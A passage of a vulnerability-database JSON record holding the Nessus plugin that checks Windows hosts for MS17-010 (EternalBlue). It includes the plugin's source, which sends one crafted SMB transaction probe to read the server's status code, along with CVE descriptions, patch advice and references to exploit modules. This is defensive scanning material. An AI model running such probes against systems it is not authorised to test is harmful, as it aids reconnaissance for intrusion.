"SMNTC-96704", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-08-11T13:59:25", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-08-11T13:59:25", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.", "nessusSeverity": "", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS: CANVAS", "Metasploit: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption"]}, "lastseen": "2021-08-11T13:59:25", "differentElements": ["vpr"], "edition": 7}, {"bulletin": {"id": "MS17-010.NASL", "hash": "9f27d1c3c853148fb2dc39ebb0f4d8c6", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?d9f569cf", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "http://www.nessus.org/u?b9d9ebf9", "http://www.nessus.org/u?234f8ef8", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?065561d0", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?321523eb", "https://github.com/stamparm/EternalRocks/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-12T12:17:27", "history": [], "viewCount": 7144, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96705", "SMNTC-96704", "SMNTC-96709", "SMNTC-96707", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}], "modified": "2021-08-12T12:17:27", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-08-12T12:17:27", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n 